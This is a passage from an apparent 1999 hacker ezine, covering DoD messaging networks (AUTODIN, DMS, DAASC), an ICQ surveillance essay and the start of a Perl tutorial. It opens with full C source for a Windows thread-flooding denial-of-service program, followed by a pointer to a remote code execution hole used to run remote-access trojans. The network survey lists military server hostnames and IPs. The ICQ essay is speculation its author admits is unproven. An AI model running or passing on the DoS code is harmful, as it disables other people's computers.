unusable (SP5) */ #include #include void poobah(); DWORD WINAPI thread_func (LPVOID lpv) { DWORD id; HANDLE h; BOOL success = 1; h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id); while (success){ switch (GetThreadPriority (h)){ case THREAD_PRIORITY_ABOVE_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_BELOW_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_HIGHEST: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_IDLE: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_LOWEST: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; } } poobah(); return 0; } void poobah() { DWORD id; HANDLE h; h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id); SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); poobah(); } int main () { printf ("frootcake - kiva@wookey.org\n"); poobah(); return 0; } --- As you always know, i like to save the best 'til last. Probably the most serious hole found recently is a whole that affects 90% of windows servers on the net, and allows you to execute code remotely. This is a VERY serious whole that can allow you to run any program you like, including netbus and back orafice. got to: http://www.eeye.com/database/advisories/ad06081999/ ad06081999-exploit.html for more info --- Thats all for now. All these bugs aren't garrenteed to work, i haven't varified most of them so don't come bitching when they don't -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ DoD - DMS/AUTODIN ]::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]:::: -->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]::::::::::::: Government/Military Defense Telecommunications Systems. [AUTODIN] [DMS] [DSN] [DAASC DDN] [CSP] June 1999 by hybrid [ http://hybrid.dtmf.org hybrid@dtmf.org ] ------------------------------------------------------- HI. This is a small article designed to be an introduction to the AUTODIN, DMS and surrounding DSN government networks. It is not intended as a definitive guide, I have only listed a few of many networks, it is more focused on the summerisations and definitions of these networks :) So why write an article on this subject?, Well basically I personaly find the networks featured in this article very interesting, in the sense that I'm curious as to why and how there where implemented and/or integrated with the networks that exist today. I am in no way interested in gaining access to any of these networks, All I have done here is done a little research through the means of http, and news articles. About this article.. In respect of the information sources of this article, any parts I have copied, or used as an example are enclosed in speech marks (") or begun and ended within a --- line. ALL of the information in this article has been obtained from public domain resources, to find out more about the systems and networks covered in this brief article, see the http links at the end of the file. Thanks for reading this, hope you enjoy the article.. A U T O D I N ************* DoD Automatic Digital Network (AUTODIN) The AUTODIN digital network is a worldwide data communications network of the Defense Communications System, and the US Department of Defense. It is currently being upgraded and phased out by newer networks such as the DSN (Defence Switched Network) and the Inter-Service/Agency Automated Message Proccessing Exchange (I-S/A AMPE). This article will begin by focusing in on the AUTODIN network, then progress to describe and summerise the more contempory networks such as AMPE and the DSN. Currently the entire AUTODIN network is being replaced mainly by the Defence Messaging System (DMS), again I will discuss these networks in more detail after we've taken a look at AUTODIN as you will provide better understanding of the newer networks. The AUTODIN network is operated and maintained by the Defense Information System Agency (DISA). The network is colosal in size and spans the globe, and is intended for secret computer-controlled communications for the DoD, and other Federal linked organisations and entitys. The whole system works on a multi-level security platform, and operates using digital store and message forwarding switching technolgys. Other majour government and military entitys that use the AUTODIN network include the NSA (National Security Agency), the DIA (Defense Intelligence Agency), and other well known organisations such as NATO. Obviously the bodies that use the AUTODIN network for secure communications can be very secretive, so the entire network was designed to be extreamly secure with its user access levels. An external penetration of this network would prove to be extreamly damaging to the the privacy of the concerned government entitys, so it has been quite difficult to obtain raw technical specifications of this network. "National security could be affected if classified messages are not delivered on secure lines in a timely manner." The AUTODIN network can be accessed many ways, but primarily via the use of a terminal called 'GateGuard'. GateGaurd operates on a desktop or laptop computer, and is usually installed on AUTODIN subscriber premises. Origionaly the AUTODIN network had to have human couriers to carry messages between organisations by hand, now the GateGuard software does all that. The system is designed to be an electronic gateway between the AUTODIN network and the local phone office automation system (OAS). The idea is that no sensitive messages or data can be lost during there travels through the OAS center. At the moment, the gateway software is being used by many AUTODIN linked entitys such as the Navy, the Army, Air Force Marine Corps, FAA, The Coast Guard, and the DNA. The software is very versatile, but at the same time extreamly secure. It enables users of the network to load the software onto there own terminals, or laptops and then connect there STU III's (via the PSTN) directly to the AUTODIN interface, essentialy forming a portable AUTODIN terminal. The portable terminals can be linked to the AUTODIN network via standard phone lines, cellualr lines, or via IMMARSAT (A Satelite network). If you are like me you are probably thinking 'hey, this cant be secure..' wrong: It appears that this kind of link is very secure, do you really think the DoD would use non-secure phone lines as direct links to AUTODIN?.. To get around this security flaw, the AUTODIN terminal system is operated by a TCC telecommunications center, and links to and from the TCC implement strong encryption techniqes such as KG Key Generators. Of course, all phone/data networks need switches and routers, so the AUTODIN network is controled and routed by a system called ASC (The AUTODIN Switching Center). The system is one of the primary elements in the Defense Communications System, and operates over high-speed secured data links spanning the globe. The ASC system handles a large amount of classified data, (4 million messages a month). The switching system consists of 14 trunks and 75 circuits and is connected to Defense communications centers accross the world, the system also implements DCS HF radio to mobile forces on the ground. The system also handles data traffic for highly classified aircraft missions for the 1st and 99th airlift sqaudrons. The switching/routing system was designed so well it bareley suffers any downtime, and would obviously be extreamly secure. The AUTODIN network was origionaly a backbone and stand-alone system, serving as a primary network for secret data transmission. In June 1998, a communications company managed to develop a system that would enable the AUTODIN network to be connected to the SIPRNET Defense network. Because SIPRNET is based upon the IP protocol, it was incompatable with the AUTODIN protocols which operate over point-to-point leased lines. The new routing system (by Sm@rtRouters) enables the two networks to operate similtaniously integrating each others protocols (IP + leased lines). The system works by integrating MDTs and AISs (Automated Information Systems) onto the SIPRNET network. When an MDT/AIS sends a message, the locally connected router translates the AUTODIN data stream into IP packets and sends them out on the SIPRNET network. Then on the SIPRNET another router receives the IP packets, translates them back into the AUTODIN format, and then passes the message to its MDT or AIS. The sending and receiving MDTs and AISs are unaware that they are communicating via the SIPRNET, therefore the whole system works just as the older AUTODIN network did, but with the use of IP networks. The routing works a little like ss#7 telephoney, whereas signals are looked up in translation tables, and sorted in order of importance, or as the DoD would say ('order of precedence'). The DMS System (Defense Messaging System) is one of the newest developments designed to take place of the AUTODIN network. The new DMS network will be fully implemented in august 1999, and as before will operate on highly calssified information transmission links. The idea is to make the entire DoD communications network fully automated, without the use of man-power in the maintanance of network nodes etc. Again, the network is controled by the DSA, and opertates on a message-to-reader protocol, I guess this eliminates the securty flaws of similtanious message formats. The entire system is proposed to be fully operational by the year 2OOO, and be fully accessable by DoD members. "DMS is a network-centric application that rides on the Defense Information Systems Network." The Defense Automatic Addressing System Center DDN.. Where non-AUTODIN communication is concerned, the DAASC system has been implemented. The system covers other government networks such as DISN, SNA, DECNET etc. The system operates over the DAASC DDN file format protocol, and is designed for the exchange of data with accountablity and tracability. To get access to the DDN, the subscribers are expected to submit a 'DAASC DDN' questionare, which will then be passed though various channels until it can be verified and approved for connection to the DDN network. Once the applicant has been approved for connection to the network, they are given a login and password, which is used to various file transfer protocols such as FTP on the DDN servers. The applicant will first be made to login to one of the servers at Dayton/Tracy on a test basis, there account will subseqentialy be activated for future use. The DAASC DDN network servers are as follows, --------------------> The DAASC DDN circuits at DAASC Dayton, Ohio and DAASC Tracy, California dayf1b.daas.dla.mil 198.97.76.200 * The DAASC system can be accessed dayf2b.daas.dla.mil 198.97.76.201 * via many ways, icluding dialup, dayf1.daas.dla.mil 192.67.251.15 * FTP etc. I do have the actual dayf2.daas.dla.mil 192.67.251.16 * login procedures for each node, * which I obtained from [public] trafe1.daas.dla.mil 198.97.75.15 * HTTP, I feel it is un-nesasery to trafe2.daas.dla.mil 198.97.75.16 * provide such details, as I am not trafe1b.daas.dla.mil 198.97.74.15 * encouraging such access to these trafe2b.daas.dla.mil 198.97.74.16 * networks and servers. <-------------------- The DAASC network will terminate connectivity to the AUTODIN network at the end of this year (1999). The DAASC system operates on many different software and mechanisms. For example, a system called DAMES is designed to be run on a DAASC network subscibers pc, and like conventional pstn communication, is designed to implement phone lines as a means of transporting information with the use of a standard modem. -------------------------> " DAMES: DAAS Automated Message Exchange System. A connection between user PC and DAAS via switched dial-up modem or via network (ftp) connection. PC Software is furnished free of charge to United States Government Activities and authorized Defense Contractors. " " DIELOG: DAAS Integrated E-Mail Logistics System. Allows users to transmit and receive data via their electronic mail system. " " DDN: Defense Data Network. DAASC developed a capability, and associated messaging format to support the exchange of JANAP-128 and user defined variable length message data across the DDN/DISN using the File Transfer Protocol (FTP). This capability has been in place since mid 1993. The DDN file format is the preferred method of the exchange of data between the DAASC, and our over 177,000 customers. " " DARS: DAAS AUTODIN Replacement System. A suite of programs that were developed to allow DAASC customers to transmit and receive data pattern messages via their UNIX based systems. The software will manage and control the transmission of data pattern traffic via Defense Information Systems Network (DISN) utilizing the functions of FTP. " <------------------------- Communications Support Processor (CSP) The CSP is a message processing system that is designed to provide trusted handeling of data traffic, it runs on a multi-level secure MLS mode operation basis, for tactical communications. The CSP handles message switching and security checks for communication throught the AUTODIN and surrounding networks/systems. During the metamorph from AUTODIN to DMS, the CSP system will run alongside and be integrated with TCP/IP encryption techniqes, eventually the CSPs will be connected to satelite communication nodes, and therefore eliminate the DoD's dependancy on the older AUTODIN network. The CSP system will be used for secure writer-to-reader transmissions, using protocols such as X.400/X.500 messaging formats. The CSP has been designed to be able to convert DMS X.400 messages to the older AUTODIN format, and vice versa, the TCP/IP encryption will be used to allow messages to be passed though the JWICS WAN or SPECAT over the SIPRNET network, ensuring 'bullet- proof' communication transmission. SMART (Secure Messaging and Routing Terminal, is used to segregate less-sensitive information from the more classified data, the SMART system is capable of delivering AUTODIN messages to email users who are located either on the JWICS, SIPRNET or NIPRNET communications networks. A 'secure' email techniqe has been developed for this network that allows users on a secure LAN to send and recieve AUTODIN messages via a Netscape browser, obviously Microshaft browsers where incapable of supplying addiquit security for the DSN ;) The software is called SMART:SecureMail, and is said to be capable of strict privacy and authentification. Because of this network can contain very sensitive data, the following security measures have been tested and implemented on the CSP.. --------------------> Software Security Provisions * TCP/IP Selectable Triple DES Encryption * User authentication and verification with automatic password aging * Advanced user permission schemes * Security audit trail storage and retrieval * Message level CRC on input and output * Color coded security labels on all windows * Link level and message level protocol handshaking * Message security validation to input/output * Redundant message file storage * Send Authentication and Validation * Operating System monitored and protected against unauthorized intrusions. Security/Accreditation/Certifications * DIA accredited for consolidated R/Y communications with AUTODIN * Certified DoDIIS Core/Key Product * DISA Category I/III Certification * Meets AMPE security requirements of DIA Cir 5030.58-M * Accredited for MLS Mode of Operation (DCID 1/16 compliant) <----------------------- More on the Defense Messaging System (DMS) The Defense Message System (DMS) is a DoD system designed to replace the AUTODIN network, previously discussed in this article. The DMS Program was established by the Under Secretary of Defense for Acquisition in order to "facilitate and coordinate development of an integrated, common-user message system" for organizational and individual users. The main concept of the DMS system as said before is to reduce DoD costs on the demanding AUTODIN networks, ie: the newer DMS network is more or less fully automated, the DMS preogram is operated and maintained by the DISA (www.disa.mil). The older less-advanced AUTODIN system has served as a secret communications network for the DoD and surrounding orgainisations for over 30 years, and is said to be at times very slow, and limited to textual data, it used to operate on a 2.4 Kbps connection. The new DMS system is capable of both textual and graphical messages with also multi-media attachments. The DMS service is designed to provide 3 main services to it's subscribers.. Messaging, Information Security, and Directory services. -----> DMS Messaging Services are built around an X.400 Message Transfer System (MTS), a collection of all the system components which store and forward messages to the user at their desktop computer. DMS compliant software, and in some cases hardware, are required to access DMS messaging services. DMS Information Security (INFOSEC) Services use the National Security Agency's (NSA) Multi-level Information Systems Security Initiative (MISSI) products to provide information security services. Guards and firewalls provide security and a certain degree of interoperability between different user communities. FORTEZZA cards, about the size of inch thick credit card, provide encryption and digital signature services at the desktop. Current DoD plans that each user be issued a FORTEZZA card; however, this requirement may be relaxed in the near future so that only organizational releasers need FORTEZZA cards. The FORTEZZA card is inserted into the PCMCIA slot on a DMS compliant workstation. DMS X.500 Directory Services include a distributed global database that contains addressing and security information about all DMS users. The Directory Services ensure messages sent to organizations, collective addressees (CAD's) or individuals are properly addressed. DMS compliant workstations, such as the CGSW-III, facilitate access to DMS directory services. <----- The DMS system is designed to share telecommunications circuits with other networks, unlike the previous AUTODIN network that used dedicated trunks. Like all networks, the DMS has its own layer of physical and meta-physical layers, in the case of DMS we see a hardaware layer and configuration, software, and like other networks the DMS has it's own set of procedures and standards. The DMS system can handle secure messaging via the X.400 message protocol, ie: messaging--distribution--proccessing, the term for the DMS messaging system is (Message Handeling System) or MHS. All these networks are supposed to be very secure, I doubt the DoD would use them ubless they undergo extream levels of security testing, the data that travels the DMS is very sensitive so the DoD and other departments would not want a security leak on there hands, therefore the DMS network has integrated security features to ensure the privacy an protection of classified data. Some of these security procedures and implementations are as follows.. ---> FORTEZZA Cards ************** The FORTEZZA PCMCIA card provides four essential security services: data confidentiality (privacy of information), data integrity (assures message is unaltered), user non-repudiation (undeniable proof that the information was sent by the sender), and user authentication (proof that the individual users and hardware components are who or what they are supposed to be). The cards use Type II encryption/decryption, data hashing, and digital (electronic) signatures. Type II algorithms are those algorithms that have been approved by the National Security Agency (NSA) for the protection of Sensitive But Unclassified (SBU) information. NSA has approved the use of the Fortezza card for Secret-high messages for an interim period. This policy is known as "Fortezza for Classified" (FFC). In addition to these Type II algorithms, FORTEZZA cards contains user certificates. Each certificate contains the name of the issuer (the certification authority), expiration date, user name, public key information, clearance level (e.g., Top Secret (TS), Secret (S), Sensitive But Unclassified (SBU)) and privileges (e.g., message releaser). Guards ****** The DMS Guard is used in the end-state DMS architecture to permit the exchange of Secret DMS messages over an Unclassified backbone by protecting the connection to the Unclassified backbone and by performing a check on all outgoing messages to ensure that they were encrypted. The Guard also checks to see if the message originator and/or recipients can send and/or receive messages from a system-high enclave. In the SBU solution set, the Guard will permit the exchange of Unclassified DMS messages between the Secret enclave and an Unclassified enclave. Firewalls ********* The typical firewall ensures that only authorized message packets and service requests are allowed to pass through the firewall. The firewall will protect LANs, NIPRNET, Internet, or modem attack by blocking direct access to unauthorized users. In addition to maintaining access controls to the network, the firewall will maintain extensive audit records detailing both successful and unsuccessful attempts to access the system. Certification Authority Workstation (CAW) ***************************************** The CAW is used to manage DMS X.500 certificates and program FORTEZZA cryptographic cards with a user's security profile, including security certificates, credentials and cryptographic key. The CA uses an Administrative Directory User Agent (ADUA) to post the public portion of the user's certificate to the Directory. Within the Coast Guard, it's expected that CA duties will primarily be performed by the traditional CMS Custodian. Organizational Registration Authority Workstation (ORAW) ******************************************************** The ORAW is a COTS workstation used by the Organizational Registration Authority (ORA) at individual commands to assist the CA in the FORTEZZA card management process. The ORAW enables the ORA to gather and format user information for electronic submission to the CA in order to register the user. This user information consists of the user's distinguished name (unique DMS user name), release authorizations (e.g., organizational message, individual message), and classification level (e.g., SBU, Secret). The ORAW cannot sign user security certificates. <---- Acronyms and abbreviations. *************************** ACP-120 NATO classified X.400 message operation ACP-123 Common Messaging Strategy & Procedures (X.400 Military Messaging) ADNET Anti-Drug Network ADUA Administrative Directory User Agent API Application Programming Interface ASC AUTODIN Switching Center AUTODIN Automatic Digital Network BAH Booz, Allen & Hamilton - Government Contractor BMTA Backbone Message Transfer Agent C3I Command, Control, Communications & Intelligence C4I Command, Control, Communications, Computers & Intelligence CA Certificate Authority CAMS Communication Area Master Station (USCG) CAP Component Approval Process CARD Cost Analysis Requirements Document CAW Certificate Authority Workstation CCB Communications Configuration Board CGDN Coast Guard Data Network (56Kbps backbone) CGDN+ Coast Guard Data Network Plus (T1 backbone) CGISS Coast Guard Intelligence Support System CKL Compromised Key List CMS Communications Security Material System CN Common Name CNO Chief, Naval Operations COMDT Commandant USCG COMSEC Communications Security COTS Commercial Off-The-Shelf CRL Certificate Revocation List CS2K COMMSYS 2000 (USCG TISCOM) CSSAMPS Classified Standard Semi-Automated Message Processing System CTOS Convergent Technologies Operating System (SW-II) DAA Designated Approving Authority DAG DMS Advisory Group DAP Directory Access Protocol DAPP Defense AUTODIN Phase Out/DMS Phase In Plan DIA Defense Intelligence Agency DIB Directory Information Base DISA Defense Information Systems Agency DISN Defense Information Systems Network DISP Directory Information Shadowing Protocol DIT Directory Information Tree DL Distribution List DMS Defense Message System DN Distinguished Name DNS Distinguished Name Server DON Department of the Navy DRB Discrepancy Review Board DSA Directory System Agent DSP Directory System Protocol DSS Digital Signature Standard DSCS Defense Satellite Communications System DUA Directory User Agent email Electronic Mail EC/EDI Electronic Commerce/Electronic Data Interchange ECP Emergency Command Precedence EFA Engineering Field Activity EI&A Enhanced Identification & Authentication EOS Element of Service ESL Enterprise Solutions, Ltd. (contractor) EXM Enterprise eXtended Mail FAMIS Fleet Automated Messaging Interface System FFC Fortezza for Classified FORTEZZA Personal credit card sized encryption device FSP Functional Security & Performance (testing) G/G Gate Guard G-SCT Commandant, USCG Telecommunications Branch GCC Global Control Center GCCS Global Command & Control System GCSS Global Combat Support System GDS Global Directory Service GENSER General Service (U, C, S, T) GUI Graphic User Interface HD Help Desk HP Hewlett Packard IDUA Integrated Directory User Agent IEM Information Exchange Meeting IG Implementation Group IMTA Intermediate Message Transfer Agent INE In-Line Network Encryption IOC Initial Operational Capability IOT&E Initial Operational Test & Evaluation IP Internet Protocol IPMS InterPersonal Message Service (P22 format) IPT Integrated Process Team IPWG Implementation Planning Working Group ISO International Standards Organization ISSO Information Systems Security Officer ISWG Integrated Security Working Group ITDS Information Transfer Distribution System JANAP Joint Army Navy Air Force Publication JMCISS JWICS Joint Worldwide Intelligence Communication System KEA Key Encryption Algorithm KMID Key Material Identifier KP Key Processor (LMD/KP) LAN Local Area Network LANTAREA Commander Atlantic Area USCG LAT Logistics Action Team LCC Local Control Center LDAP Local Directory Access Protocol LMD Local Management Device (LMD/KP) LMFS Lockheed Martin Federal Systems MADMAN Mail & Directory Management MAFB Maxwell Air Force Base MAISRC Major Acquisition Information Systems Review Committee MAN Metro Area Network MARCORPSYSCOM Marine Corps Systems Command MCEB Military Communications Electronics Board MCS Message Conversion System MDT Message Distribution Terminal MEK Message Encryption Key MFG Multi-Function Gateway MFI Multi-Function Interpreter MHS Message Handling System MIB Management Information Base MIME Multi-purpose Internet Mail Extensions MISSI Multi-Level Information System Security Initiative ML Mail List MLA Mail List Agent MLS Multi-Level Security MM Military Message MMHS Military Message Handling System MMS Multi-Level Mail Server MPRS Message Prep & Review Software (USCG) MROC Multi-Command Required Operational Characteristics MS Message Store MSP Message Security Protocol MTA Message Transfer Agent MTDS Message Transfer Distribution System MTS Message Transfer System MWS Management Work Station NAVCOMPARS Naval Communications Processing & Routing System NAVMACS Navy Modular Automated Communications System NAVMACS II Navy Modular Automated Communications System 2nd Generation NCP-II Naval Communications Processing & Routing System 2nd Generation NCTAMS Naval Computer & Telecommunications Area Master Station NCTC Naval Computer & Telecommunications Command NCTS Naval Computer & Telecommunications Station NDN Non Delivery Notice NDR Non Delivery Report NIPRNET Non-classified Internet Protocol Routed NETwork NISE East Naval In Service Engineering East NOVA NSA developed Message Handling System NSA National Security Agency NSANET National Security Agency Network NSAP Network Service Access Point NSM Network Security Manager NSS Network Security System O Operational Immediate Precedence O/R Originator/Recipient OA Operational Assessment OLE Object Linking & Embedding OM Operations Manager OPWG Operations Planning Working Group ORA Organizational Registration Authority ORAW Organizational Registration Authority Work Station OSC Operations Systems Center (USCG, Martinsburg, WV) OSD(C3I) Office of the Secretary of Defense for Command, Control & Communications OT&E Operational Test & Evaluation OU Organizational Unit P Priority Precedence P772 Military Message Format PAA Policy Approving Authority PACAREA Commander Pacific Area USCG PCA Policy Creation Authority PCMCIA Personal Computer Memory Card International Association PDU Protocol Data Unit PIN Personal Identification Number PLA Plain-Language Address PMO Program Management Office PMSS Program Management Support System (Database) PN Personal Name POM Program Operating Memorandum POP Point of Presence PRMD Private Management Domains PUA Profiling User Agent R Routine Precedence RCC Regional Control Center RCDB Routing & Configuration Database RCP Resource Change Proposal RDN Relative Distinguished Name RI Routing Indicators ROMC Required Operational Messaging Characteristics S/A Service Agency SA System Administrator SBU Sensitive But Unclassified SCI Sensitive Compartmented Information SCIF Sensitive Compartmented Information Facility SDA System Design Architecture SDN Secure Data Network (USCG Dial-up via STU-III) SEC Single Enabling Capability SEMCOR Government Contractor SEWG System Evolution Working Group SHA Security Hash Algorithm SIMWHG Special Intelligence Message Handling Working Group SIPRNET Secret Internet Protocol Routed NETwork SMS Service Management System SMTA Subordinate Message Transfer Agent SMTP Simple Mail Transfer Protocol SNMP Simple Network Management Protocol SNS Secure Network Server SO Security Officer SPAWAR Space & Naval Warfare Systems Command SRA Sub-Registration Authority SSAMPS Standard Semi-Automated Message Processing System ST&E Security Test & Evaluation STU-III Secure Telephone Unit 3rd Generation SW-II CG Standard Work Station II SW-III CG Standard Work Station III TAIS Target Architecture & Implementation Strategy TCC Telecommunications Center TCP/IP Transport Control Protocol/Internet Protocol TEWG Test & Evaluation Working Group TIIWG Transition Implementation & Integration Working Group TISCOM Telecommunication & Information Systems Command (USCG) TT Trouble Ticket TWG Tactical Working Group UA User Agent UNIX Common Operating System USAF U. S. Air Force USCG U. S. Coast Guard USMC U. S. Marine Corps USMTF U. S. Message Text Format USN U. S. Navy VPN Virtual Private Network W Critic Precedence WAGB Icebreaker (USCG) WAN Wide Area Network WHEC High Endurance Cutter (USCG) WinNT Windows NT Operating System (SW-III) WMEC Medium Endurance Cutter (USCG) X.400 Messaging Message Handling System Standard X.500 Directory Directory System Standard Y Emergency Command Precedence (ECP) Z Flash Precedence References & Source Material **************************** U. S. Navy DMS Master Plan U. S. Navy DMS Transition Plan U. S. Coast Guard DMS Transition Plan Lockheed Martin Federal Systems (LMFS) DMS Product Guide U. S. Navy DMS Ordering Guide DMS System Design Architecture (SDA) http://www.disa.mil/ http://fmpweb.nctsw.navy.mil/manual/ManolAUTODIN.htm http://www.andrews.af.mil/89cg/789cs/System_Flight/autodin.htm http://www.periscope.ucg.com/terms/t0000059.html http://www.periscope.usni.com/demo/terms/t0000059.html http://www.cio.dla.mil/dms/AUTODIN.htm http://199.209.74.26/mastats.htm http://www.ld.com/cbd/archive/1995/01(January)/24-Jan-1995/Dawd001. http://www.af.mil/news/Jan1999/n19990115_990057.html http://www.daas.dla.mil/daashome/daasc_dars.htm http://daynt2.daas.dla.mil/daasc_dars.htm ---------- Shouts to D4RKCYDE 9X and B4B0. http://darkcyde.system7.org http://hybrid.dtmf.org http://b4b0.org http://ninex.com hybrid@dtmf.org -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.0i for non-commercial use Comment: I Encrypt, Therefore I Am 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 Oy4= =Netg -----END PGP PUBLIC KEY BLOCK----- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ ICQ Conspiracy ]::::::::::::[OO--[ by camel ]---[ ]:::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: The ICQ Conspiracy By Camel Most of us have heard of or used the Internet communication program called ICQ. For those of us who have not, it is a client that has chat, email and other functions built-in. What started my suspicion of this program is that everybody has their own number. Unlike IRC where servers, hosts, nicknames and other such things are ever changing... ICQ has a constant. On IRC a law enforcement agency would have to use a lot of resources and effort to get to you, such as contacting a server in order to log your chat session. A change is about to undergo in our government, which will require all corporate CIO's to obtain a top-level security clearance. They claim it will help reinforce our nations' technologies security infrastructure. To me it sounds like a way for the government to control these technology companies who create hardware and other such technologies as Internet communication tools, e.g., ICQ. Normally, if an agency were to gather intelligence of a suspect under investigation and wanted to go about it by logging his/her Internet data, they would have to go through some serious action and obtain something like a court order. With this new rule in place, any government official who has the power to do so could order the company to create a backdoor, or something of the sort, in a program and the company would have to keep their mouth shut. It is no secret that the NSA and other such agencies monitor information over Internet connections, but you might _not_ have known that there are applications that were purposely made to gather information about a user and even grab files from your computer. One non-classified example that could be considered a form of this is known as Enterprise Information Portals. These are applications that enable companies to unlock internally and externally stored information, and provide users a single gateway to personalized information needed to make informed business decisions. Try replacing the word "business" with "investigation" and see what you come up with. Now, why ICQ? I already stated that a constant is much easier to monitor and log than a variable. In addition, ICQ has several normally completely different communication methods all in one. What is even _better_ is all of you people using ICQ are Tagged and Numbered for easy tracking. Okay, so what? The NSA knows my ICQ number is 1777849, if I choose to communicate something incriminating or very personal I will just create another account... right? Sure, go ahead. But it is also no big secret that individual computers give out 'personalized' information which if they logged you once, they _know_ exactly what to look for and could find your new account with a scan of some sort. Well, fuck me sideways! Hey, this wont happen until they change that security clearance thing will it? Well, the NSA scans every telephone, Internet, radio and satellite communication in the world for things of interest such as "terrorism". The government regularly invades your privacy and what you thought were your rights every single day. You make the call. I have not uncovered some super secret conspiracy, I have no proof. It just seems logical that with all these methods of surveillance _proven_ to exist, I would definitely take advantage of ICQ's 'features'. With all this in mind... do you trust _your_ ICQ?? -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Perl Programming ]:::::[OO--[ by z0mba ]---[ zomba@addicts.org ]::: -->[OO]:::::::::::::::::::::::::::::::[ http://members.xoom.com/phuk ]::::::: Okay, so I was sitting there wondering what the hell I could write an article about and came up with two things, Perl Programming and Setting up an FTP Server under Linux. I will try and get both these files into f41th 7 but if I can't then Setting up an FTP Server *will* appear in f41th 8. Anyways, 0n w1f d4 ph1l3... Please note: when I start talking in m4d h4x0r t4lk, it is for the benefit of the lamers that read f41th who are trying to skool themselves cos I know they just don't understand it otherwise. Introduction ------------ Perl stands for Practical Extraction and Report Language and is one of the favourite scipting languages for *nix platforms. If you've never come across perl code before then it 